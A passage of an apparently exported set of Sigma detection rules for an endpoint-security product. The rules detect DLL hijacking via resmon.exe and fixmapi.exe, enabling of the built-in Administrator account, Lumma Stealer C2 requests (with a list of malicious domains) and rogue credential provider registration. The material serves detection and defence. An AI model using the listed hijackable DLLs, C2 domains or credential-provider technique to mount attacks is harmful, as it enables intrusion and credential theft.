"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098363Z",
"creation_date": "2026-03-23T11:45:34.098365Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098370Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_resmon.yml",
"content": "title: DLL Hijacking via resmon.exe\nid: 4996243a-ea42-46d9-a1b0-e483d412ded9\ndescription: |\n Detects potential Windows DLL Hijacking via resmon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'resmon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\PROPSYS.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4996243a-ea42-46d9-a1b0-e483d412ded9",
"rule_name": "DLL Hijacking via resmon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via resmon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "49bc86b5-f934-4b46-9a06-d622421cdc35",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089934Z",
"creation_date": "2026-03-23T11:45:34.089936Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089940Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#administrator",
"https://attack.mitre.org/techniques/T1078/001/"
],
"name": "t1078_001_administrator_account_enabled.yml",
"content": "title: Built-in Administrator Account Enabled\nid: 49bc86b5-f934-4b46-9a06-d622421cdc35\ndescription: |\n Detects the activation of the built-in Administrator account.\n This account is disabled by default on workstation and can be used by attackers to maintain access to victim system via a persistence.\n It is recommended to investigate this action to determine its legitimacy and investigate any suspicious authentications using the administrator account.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#administrator\n - https://attack.mitre.org/techniques/T1078/001/\ndate: 2023/12/12\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.initial_access\n - attack.t1078.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.AccountManipulation\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n Source: 'Microsoft-Windows-Security-Auditing'\n EventID: 4722\n TargetSid|endswith: '-500'\n\n filter_system:\n SubjectUserSid: S-1-5-18\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "49bc86b5-f934-4b46-9a06-d622421cdc35",
"rule_name": "Built-in Administrator Account Enabled",
"rule_description": "Detects the activation of the built-in Administrator account.\nThis account is disabled by default on workstation and can be used by attackers to maintain access to victim system via a persistence.\nIt is recommended to investigate this action to determine its legitimacy and investigate any suspicious authentications using the administrator account.\n",
"rule_creation_date": "2023-12-12",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "49c66d4d-9c2f-494f-8e7b-c7c7eb891011",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091616Z",
"creation_date": "2026-03-23T11:45:34.091618Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091622Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1071_001_lumma_stealer_url_request.yml",
"content": "title: URL Request Related to Lumma Stealer\nid: 49c66d4d-9c2f-494f-8e7b-c7c7eb891011\ndescription: |\n Detects requests to URLs related to Lumma Stealer.\n Lumma Stealer is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022.\n It is recommended to investigate the request performed by the process to determine its legitimacy.\nreferences:\n - https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2024/08/17\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - attack.command_and_control\n - attack.t1071.001\n - attack.exfiltration\n - attack.t1041\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Stealer.LummaStealer\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection_generic_v1:\n RequestUrlPath: '/c2sock'\n RequestUrlVerb: 'POST'\n\n selection_generic_v2:\n RequestUrlHost|endswith:\n - '.shop'\n - '.site'\n - '.biz'\n RequestUrlPath: '/api'\n RequestUrlVerb: 'POST'\n\n selection_domain:\n RequestUrlHost|endswith:\n - '.quickworld.shop'\n - '.experttech.shop'\n - '.techresource.shop'\n - '.prinntypainrwi.shop'\n - '.pang-scrooge-carnage.shop'\n - '.claimconcessionrebe.shop'\n - '.divosrcemusemutati.shop'\n - '.gemcreedarticulateod.shop'\n - '.liabilityarrangemenyit.shop'\n - '.secretionsuitcasenioise.shop'\n - '.filetip.shop'\n - '.denbangladeesk.ru'\n - '.malazika.icu'\n - '.nvsrvmgr.org'\n - '.agentyanlark.site'\n - '.bakedgooak.site'\n - '.bellykmrebk.site'\n - '.commandejorsk.site'\n - '.delaylacedmn.site'\n - '.famikyjdiag.site'\n\n condition: 1 of selection_*\nlevel: high\n#level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "49c66d4d-9c2f-494f-8e7b-c7c7eb891011",
"rule_name": "URL Request Related to Lumma Stealer",
"rule_description": "Detects requests to URLs related to Lumma Stealer.\nLumma Stealer is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022.\nIt is recommended to investigate the request performed by the process to determine its legitimacy.\n",
"rule_creation_date": "2024-08-17",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1005",
"attack.t1041",
"attack.t1071.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "49c85d57-bba9-4d25-8825-752b9581d109",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589486Z",
"creation_date": "2026-03-23T11:45:34.589490Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589498Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fixmapi.yml",
"content": "title: DLL Hijacking via fixmapi.exe\nid: 49c85d57-bba9-4d25-8825-752b9581d109\ndescription: |\n Detects potential Windows DLL Hijacking via fixmapi.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fixmapi.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\mapistub.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "49c85d57-bba9-4d25-8825-752b9581d109",
"rule_name": "DLL Hijacking via fixmapi.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fixmapi.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "49c89875-fa13-4a83-a71b-911e70858184",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079798Z",
"creation_date": "2026-03-23T11:45:34.079800Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079804Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kcredentialprovider.c",
"https://blog.leetsys.com/2012/01/02/capturing-windows-7-credentials-at-logon-using-custom-credential-provider/",
"https://attack.mitre.org/techniques/T1556/002/",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1556_002_credential_provider.yml",
"content": "title: New Credential Provider Installed\nid: 49c89875-fa13-4a83-a71b-911e70858184\ndescription: |\n Detects the installation of a new credential provider.\n Attackers can install a new credential provider in order to obtain user credentials. For instance, Mimikatz has this feature.\n It is recommended to analyze the DLL pointed to by the registry key and the process responsible for the registry modification to determine the legitimacy of this action.\nreferences:\n - https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kcredentialprovider.c\n - https://blog.leetsys.com/2012/01/02/capturing-windows-7-credentials-at-logon-using-custom-credential-provider/\n - https://attack.mitre.org/techniques/T1556/002/\n - https://attack.mitre.org/techniques/T1003/\ndate: 2021/06/17\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1556.002\n - attack.t1003\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{????????-????-????-????-????????????}\\(Default)'\n - 'HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{????????-????-????-????-????????????}\\(Default)'\n # https://docs.microsoft.com/fr-fr/windows/security/identity-protection/hello-for-business/feature-multifactor-unlock\n\n exclusion_multifactor:\n TargetObject|startswith:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{BEC09223-B018-416D-A0AC-523971B639F5}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\'\n # C:\\Program Files (x86)\\Splashtop\\Splashtop Remote\\AutoUpdate\\SRAuto.exe\n exclusion_splashtop:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{97E1814E-5601-41c8-9971-10C319EF61CC}\\'\n # N-able Take Control Agent\n exclusion_n-able:\n TargetObject|startswith:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{0F5FAA20-61D6-4779-8DB3-F200E213DBAC}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{7BA8AD85-A98B-4689-A665-6AA987A67F2F}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{CB10239D-DDC0-4474-A462-B03D990BCD11}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{3BAB084B-F669-490F-BD07-54F50E99A93C}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{FAD0AA98-7868-4F9E-832B-B75FCBC1BB3D}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{611B4F8B-6D16-4FA8-B5C1-B0778DABDBDC}\\'\n Details|startswith: 'MSPACredentialProvider_' # MSPACredentialProvider_7.00.26.202107081422_LOGICnow\n exclusion_fortinet:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{AC7DD106-EAB6-4b41-AC4F-D52FD62A82C7}\\'\n Details:\n - 'FortiCredentialProvider'\n - 'FortiCredentialProvider?' # \"FortiCredentialProvider\\u0000\"\n # GoToAssist Remote Support\n # Parent Image: C:\\Program Files (x86)\\GoToAssist Remote Support Customer\\1702\\g2ax_service.exe\n # \"C:\\WINDOWS\\system32\\regsvr32.exe\" /s C:\\WINDOWS\\system32\\g2ax_credential_provider64_1702.dll\n exclusion_logmein_gotoassist_remote_support:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{D025C57A-763E-4B14-B580-9B5B161F08BB}\\'\n Details:\n - 'RemoteCredentialProvider'\n - 'RemoteCredentialProvider?' # \"RemoteCredentialProvider\\u0000\"\n exclusion_vaultcredprovider:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{503739d0-4c5e-4cfd-b3ba-d881334f0df2}\\'\n Details: 'VaultCredProvider'\n exclusion_pulse:\n TargetObject|startswith:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{C1258FBC-F04F-4862-B78A-DDAAEF4A9707}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{4B9CAC01-6732-40d0-8B8F-B5B340F9D44F}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{4EFD0F35-BFBA-44eb-8F25-2B3530203C1D}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{EAB1A79F-DFAA-4faf-A7B9-A6652E97EE16}\\'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{C1258FBC-F04F-4862-B78A-DDAAEF4A9707}\\'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{EAB1A79F-DFAA-4faf-A7B9-A6652E97EE16}\\'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{4B9CAC01-6732-40d0-8B8F-B5B340F9D44F}\\'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{4EFD0F35-BFBA-44eb-8F25-2B3530203C1D}\\'\n Details:\n - 'Pulse Secure SSO OneX Smartcard Credential Provider'\n - 'Pulse Secure SSO OneX Password Credential Provider Class'\n - 'Pulse Secure SSO OneX Password Credential Provider'\n - 'Pulse Secure SSO Password Credential Provider Class'\n - 'Pulse Secure SSO Password Credential Provider'\n - 'Pulse Secure SSO Smartcard Credential Provider Class'\n - 'Pulse Secure SSO Smartcard Credential Provider'\n\n exclusion_citrix1:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{81C8E4DC-B376-4D88-BCCD-BD0DD65BEE2B}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{1D7BE727-4560-4adf-9ED8-5EEC78C6ECFF}\\(Default)'\n Details:\n - 'CitrixMirrorCredentialProvider'\n - 'CtxKerbProvider'\n\n exclusion_citrix2:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{5B340FA8-5C3F-45de-87C8-487ABE91013E}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{6D050C58-74E0-40f0-87F6-FDD115B589F8}\\(Default)'\n Details:\n - 'Citrix SSOn Credential Provider'\n - 'Citrix SSOn SCard Credential Provider'\n\n exclusion_citrix3:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{DD1E7148-DD8F-486F-9358-D011E43C962D}\\(Default)'\n Details: 'CitrixCredV2'\n\n exclusion_share_mouse:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{1EDBF04D-03A6-4589-9CB4-89DC03FD175A}\\'\n Details: 'ShareMouseCredentialProvider'\n\n exclusion_setupplatform:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{C885AA15-1764-4293-B82A-0586ADD46B35}\\'\n Details: 'IrisCredentialProvider'\n\n exclusion_shrewsoft_vpn:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{F2BE9143-5D0A-4a2e-9335-CEA61ED7244E}\\'\n Details: 'ShrewSoftCredentialProvider'\n\n exclusion_paloalto_gps:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{25CA8579-1BD8-469c-B9FC-6AC45A161C18}\\'\n Details:\n - 'PanCredProv'\n - 'PanV2CredProv'\n\n exclusion_fido:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{2D8B3101-E025-480D-917C-835522C7F628}\\'\n Details: 'FIDO Credential Provider'\n\n exclusion_logonexpert:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{CB7C9FD8-2878-4d5d-9FB0-7B82DC11B2D2}\\'\n Details: 'LogonExpertCP'\n\n exclusion_remote_ngc:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{A910D941-9DA9-4656-8933-AA1EAE01F76E}\\'\n Details: 'Remote NGC Credential Provider'\n\n exclusion_hp_alm:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{7FFB76D2-64C1-47b4-9330-88F8C479B332}\\'\n Details: 'AlmRemoteAgentCredentialProvider'\n\n exclusion_thegreenbow:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{D079D17E-F83F-4507-BB06-8C215928AE3F}\\'\n Details: 'TgbCredProv'\n\n exclusion_onex:\n TargetObject|startswith:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{07AA0886-CC8D-4e19-A410-1C75AF686E62}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{33c86cd6-705f-4ba1-9adb-67070b837775}\\'\n Details:\n - 'OnexCredentialProvider'\n - 'OnexPlapSmartcardCredentialProvider'\n\n exclusion_uipath:\n Image: '?:\\Program Files (x86)\\UiPath\\Studio\\UiPath.Service.Host.exe'\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{78F48D37-36D7-4D3D-B849-040CCB7D81D2}\\'\n Details|contains: 'UiPathCredentialsProvider' # \"UiPathCredentialsProvider\\u0000XX\", with XX being garbage data\n\n # Automation Anywhere\n exclusion_anywhere:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{75A22DF0-B81D-46ed-B119-CD30507BD620}\\(Default)'\n Details: 'Automation.CredentialProvider_v11'\n\n exclusion_signandgo:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{FFE3B451-4C8D-4061-A2E5-A21C1D0FE2F3}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{0372E9C9-BED1-4332-A335-813837B54AA5}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{266fcc23-c4de-4ee8-be6b-31efb036df17}\\(Default)'\n Details:\n - 'sngCredentialProvider'\n - 'sngWrapCredentialProvider1'\n - 'sngWrapCredentialProvider2'\n\n exclusion_watchguard:\n # Watchguard VPN Client (powered by NCP)\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{B4841AC3-BB3F-4bbf-8F90-E25B45EF4CB4}\\(Default)'\n Details: 'NcpCredentialProvider' # C:\\Windows\\system32\\NcpCredentialProvider.dll\n\n # Novell ZENworks\n exclusion_novell:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{692D4DB6-7E51-4370-A9AE-AE95848DBF1E}\\(Default)'\n Details: 'ZenCredentialProvider'\n\n exclusion_duo:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{44E2ED41-48C7-4712-A3C3-250C5E6D5D84}\\(Default)'\n Details: 'CDuoPasswordCredentialProvider Class'\n\n exclusion_privileged_session_manager:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{FDDA5F4A-0396-4E85-8EE5-0203D91791AB}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{FDDA5F4A-0396-4E85-8EE5-0203D91791AA}\\(Default)'\n Details:\n - 'PSMSmartcardCredentialProvider'\n - 'PSMCredentialProvider'\n\n exclusion_kace:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{53EADCDF-631A-4f13-9B42-724CBDDA943E}\\(Default)'\n Details: 'KaceCredentialProvider'\n\n # Cisco AnyConnect\n exclusion_cisco:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential 